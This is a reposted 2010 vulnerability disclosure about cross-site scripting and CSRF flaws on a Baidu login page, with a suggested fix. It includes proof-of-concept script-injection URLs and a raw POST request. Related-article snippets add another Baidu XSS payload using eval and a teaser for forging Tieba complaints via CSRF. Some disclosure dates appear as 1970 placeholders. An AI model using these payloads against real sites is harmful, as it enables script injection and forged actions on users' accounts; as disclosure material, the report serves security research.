百度某系统登陆页面跨站及CSRF漏洞

最新推荐文章于 2023-03-25 16:52:35 发布
最新推荐文章于 2023-03-25 16:52:35 发布
阅读量1.6k 收藏
点赞数
文章标签: web安全 网络安全 安全 hack wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124187842
版权

漏洞详情

披露状态:

2010-07-25: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-25: 细节向公众公开

简要描述:

百度某系统登陆页面存在跨站及CSRF漏洞。

详细说明:

http://data.baidu.com:80/report/accounts/checkLogin?password=xx&username=xx
该页面username和password两个函数均存在跨站弱点,该页面登录提交方式为post,但是该处存在CSRF漏洞,以该跨站为例,也可进行post跨站。

漏洞证明:

http://data.baidu.com:80/report/accounts/checkLogin?password="/><script>alert(/liscker/);</script>&username=xx
http://data.baidu.com:80/report/accounts/checkLogin?password=xx&username=="/><script>alert(/liscker/);</script>
POST /report/accounts/checkLogin HTTP/1.1
Host: data.baidu.com
Accept: */*
Referer: /report/accounts/checkLogin?form_refer=/huazhuangpin3/&username=test&password=123456
Accept-Language: en-us,en;q=0.7,zh-cn;q=0.3
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Connection: Keep-Alive
Cookie: bsn=e32f13n887utmoopv5qdsrcb00
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
password=123456&form_refer=%2Fhuazhuangpin3%2F&username=%3Cscript%3Ealert%28%2Fliscker%2F%29%3C%2Fscript%3E

修复方案:

过滤跨站关键字
时间戳变量
验证码

版权声明:转载请注明来源 Liscker@乌云

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
视图、csrf、会话(登录、退出)
qq_55092161的博客
07-17 258
视图、csrf、会话(登录、退出)
RGCMS睿谷信息管理系统-PHP
06-21
dir函数,优化清理缓存和清理静态首页的过程局部更新了系统语言变量优化后台权限验证方法重构seo标题、关键词及描述规则,取消了Rgseo类重构后台系统配置模块,以便后期二次开发后台强制token验证,有效防范CSRF攻击...
Web安全漏洞CSRF
weixin_34323858的博客
09-19 136
什么是 CSRF 在了解 CSRF 之前我们需要科普两个前提。首先是登录权限验证的方式有很多种,目前绝大多数网站采用的还是 session 会话任务的方式。session 机制简单的来说就是服务端使用一个键值对记录登录信息,同时在 cookie 中将 session id(即刚才说的键)存储到 cookie 中。另外我们又知道浏览器中 HTTP(s) 请求是会自动帮我们把 cookie 带上传给服...
csrf防护的html页面,Springs CSRF保护仅* HTML登录页面
weixin_36453621的博客
06-04 230
我正在尝试利用Spring Security内置的CSRF保护。这些是我正在使用的spring版本:Spring Framework版本-4.2.1spring安全-4.0.2Spring安全性文档提到,还必须保护登录页面不受CSRF攻击。我看到启用CSRF保护(并且没有传递令牌)时,登录不起作用-符合预期。我的登录页面是纯HTML页面(不是JSP),并且我无法使用任何Spring或JSTL标记。...
CLAY黑客组织无聊爆出百度知道漏洞(百度XSS漏洞)
qq_46500308的博客
03-14 9369
今天在渗透交流群里面,无意间看到这样一张照片:## 标题 是一个叫***的人发的。 咨询过后,了解到了一些情况。 他在手机上回答百度知道的网友提出的有关XSS的问题,随便用了一些绕过技巧,编码都没有,还没有审计代码。。。。就这样绕过去,弹了窗。。。。。 也是绝了,果然奆佬就算不想测试也可以不小心成功。 这个应该很快被修复了吧,百度下次要加强过滤啊,我没有他注入的载荷,所以我给不了建议。 都传言百度防御措施厉害,可是毕竟是人设计的,没有绝对安全系统,更何况这位CLAY组织的奆佬还不是在正经测试。。。 ..
百度最新跨站漏洞
weixin_30902675的博客
07-10 103
http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%27www.safe3.cn%27%29 测试地址:运行 转载于:https://www.cnblo...
Web应用安全CSRF简介.pptx
06-18
例如,如果一个网站的私信功能和获取好友列表的接口都存在CSRF漏洞,攻击者就能构造一个恶意页面,用户访问该页面后,攻击者不仅可以获取其好友列表,还能通过私信功能向用户的所有好友发送包含恶意链接的信息。...
整理asp漏洞与入侵方式.doc
01-15
0xB7 COOIKE伪造,百度谷歌搜索CMS漏洞 10 0xB8 编辑器后台 10 0xC0附件 10 0xC1 沙盘sandbox 10 0xC2 LOCK数据包 10 0xC3 IISWRITE 10 0xC4 ACCESS跨库查询测试站点 11 0xC5 IIS短文件名漏洞利用工具 11 0xC6 经典...
信息安全技术:CSRF攻击简介.pptx
11-01
信息安全技术是保障网络环境安全的重要领域,其中,跨站请求伪造(CSRF,Cross-site request forgery)是一种常见的网络安全威胁。CSRF攻击利用了用户已经登录并保存了某些敏感信息的Web应用程序,攻击者通过诱导...
百度2008WEB开发笔试题
09-15
5. **Web安全**:可能涉及到XSS、CSRF等常见Web漏洞及其防护措施。 6. **Web框架**:如Java的Spring框架,考察开发者对MVC模式的理解,以及如何使用框架提高开发效率。 7. **版本控制**:如Git的使用,提交、分支...
百度跨站漏洞谢幕篇
abc123098098的博客
11-22 128
先把漏洞讲完,再开始扯淡。 今天的第一个漏洞还是出在spRefURL上 XSS 13: 百度空间创建文章错误返回XSS漏洞 在写博客的地方,如果提交时篡改spRefURL为恶意脚本,此时若提交失败,则返回页面中会包含我们的恶意脚本。 在创建文章时提交参数如下: 以下是引用片段: ct=1&cm=2&...
百度和苹果疑似中招log4j2漏洞
hnjsjsac的博客
12-12 605
话说,这次的漏洞影响面很广(百度和苹果已中招,后面有详细截图)。通过 Google 搜索引擎对依赖该组件的产品、其他开源组件分析,发现有 310 个产品、开源组件依赖了 Apache Lo...
csrf防护的html页面,登录表单是否需要 CSRF 保护?
weixin_33246767的博客
06-04 963
2020-02-18 补充:在说『登录 CSRF』之前先说说『CSRF(Cross Site Request Forgery)』,即跨站请求伪造。举一个真实发生过的例子,攻击者先在自己网站上创建一个页面,这个页面有一个表单,表单的提交路径却是新浪微博发新微博的地址,并且这个页面有 JS 可以让页面加载完毕的时候就自动提交表单的内容。攻击者再想各种办法,骗新浪微博某些大 V 去点击这个页面的链接,受...
界面安全性系列1-CSRF攻击
sunnydayzx的专栏
04-05 478
一.CSRF是什么?   CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么?   你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚
百度贴吧csrf让全吧吧友在自己都不知情的情况下帮你投诉指定贴吧吧主的bug
昌维的博客
06-18 1262
下面教程开始,比如说我想投诉某吧的某吧主,先填好投诉表单如图 此时此刻按f12,定位到network,按底下那个clear按钮,然后抓到数据包 这是数据包 找到form data这里,然后点view source把格式化的post数据转化为URLencode数据 也就是这个样子 这是投诉的接口 构造csrf的payload(有效载荷)为http://tieba.baidu.com/
项目一学习框架SpringSecurity07_03_SpringSecurity、退出登录、禁用CSRF、基于角色或权限访问控制、自定义403页面
小良的博客
01-26 916
系列文章目录 文章目录系列文章目录11-实验4-退出登录(注销)-禁用CSRF时的做法12-实验4-退出-启用CSRF时的做法13-实验5-基于角色或权限访问控制==这个要清楚==14-实验5-基于角色或权限访问控制 -ROLE 前缀15-实验5-基于角色或权限访问控制-ROLE的坑加前缀的原因16-实验6-自定义403页面17-实验7-记住我-内存版(下一篇)18-实验8-记住我-数据库版19-实验9-数据库登录-默认实现介绍20-实验9-数据库登录-创建UserDetailsService类21-实验9
SpringSecurity[6]-Thymeleaf中Spring Security的使用/退出登录/Spring Security中CSRF
listeningdu的博客
12-14 665
上一篇:SpringSecurity[5]-基于表达式的访问控制/基于注解的访问控制/Remember Me功能实现。
初学spring security(六)-----退出登录和CRSF
m0_48631806的博客
03-25 1000
用户只需要向Spring Security项目中发送/logout退出请求即可。<a href="/logout">退出登录如果不希望使用默认值,可以通过下面的方法进行修改。logout常用配置源码解读。
xss和csrf详解
weixin_33737774的博客
08-29 332
XSSCross site scripting,全称“跨站脚本”特点是不对服务器造成任何伤害,而是通过一些正常的站内交互途径,例如发布评论时,提交含有js的内容文本,而服务器没有过滤掉或者转义掉这些脚本,作为内容发布到页面上,那么其他用户在访问的时候就会运行这些脚本。for example:​ // 用 &lt;script type="text/javascript"&gt;&lt;/scrip...
CSRF跨站请求伪造漏洞
最新发布
12-06
CSRF(Cross-site request forgery)跨站请求伪造是一种网络攻击方式,攻击者通过伪造用户请求来冒充用户身份,从而进行一些非法操作。攻击者通常会在第三方网站上设置陷阱,引诱用户点击链接或者访问页面,从而触发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值